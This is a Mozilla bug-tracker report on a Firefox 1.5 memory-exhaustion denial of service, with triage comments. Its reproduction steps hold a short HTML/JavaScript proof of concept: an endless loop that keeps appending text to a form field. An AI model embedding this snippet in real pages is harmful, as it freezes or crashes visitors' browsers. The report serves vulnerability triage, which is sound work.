DoS caused by memory exhaustion

NEW
Unassigned

Status

()

Product:
Core
Component:
DOM: Core & HTML
Reported:
12 years ago
Modified:
6 years ago

People

(Reporter: Papalia Domenico, Unassigned)

Tracking

({testcase})

Version:
1.8 Branch
x86
Windows XP
Keywords:
testcase
Points:
---

Firefox Tracking Flags

(Not tracked)

Details

(Whiteboard: [sg:dos])

Attachments

(1 attachment)

testcase
315 bytes, text/html
Details
(Reporter)

Description

12 years ago 
User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8) Gecko/20051111 Firefox/1.5
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8) Gecko/20051111 Firefox/1.5

1.To create a page HTML with appropriate Javascript 
2.To open page 


Reproducible: Didn't try

Steps to Reproduce:
<form name="form"><input type="text" name="box"><form>
<script language="javascript">
while(true) { document.form.box.value=document.form.box.value + '%§%§%§%§%§%§%§%§%§%§%§%§%§%§%§%§%§%§%§%§%§%§%§%§%§%§%§%§%§%§%§%§%§%§%§%§%§%§%§%§%§'; }
</script>




Varying the content of box between § and % the system it goes before in crisis

Comment 1

12 years ago 
This kind of memory exhaustion works against all browsers.
Group: security
Status: UNCONFIRMED → NEW
Ever confirmed: true
Whiteboard: [sg:dos]

Updated

12 years ago
Assignee: nobody → js-console
Component: JavaScript Console → JavaScript Console
Product: Firefox → Core
QA Contact: javascript.console → jrgmorrison
Summary: Dos of the sistem → DoS caused by memory exhaustion
Version: unspecified → 1.0 Branch

Updated

12 years ago
Assignee: js-console → general
Component: JavaScript Console → JavaScript Engine
QA Contact: jrgmorrison → general
Version: 1.0 Branch → 1.8 Branch

Comment 2

12 years ago 
Created attachment 215138 [details]
testcase

Updated

12 years ago
Keywords: testcase

Comment 3

12 years ago 
Moving to DOM.
Assignee: general → general
Component: JavaScript Engine → DOM: HTML
QA Contact: general → ian

Updated

10 years ago
Component: DOM: HTML → DOM: Core & HTML
QA Contact: ian → general

Comment 4

6 years ago 
This kind of attack is possible by scripts only and when this kind of script is used, we get regular alert box saying that script seems to be unresponsive, what would you like to do, stop the execution or continue with it.
Even if you click on continue, you get another alert box after sometime asking the same and hence this does not remains DOS attack as the user is given regular option to stop the script.
In my option, this bug is fixed and this is the best possible way to fix this issue.

Updated

6 years ago
Assignee: general → nobody
You need to log in before you can comment on or make changes to this bug.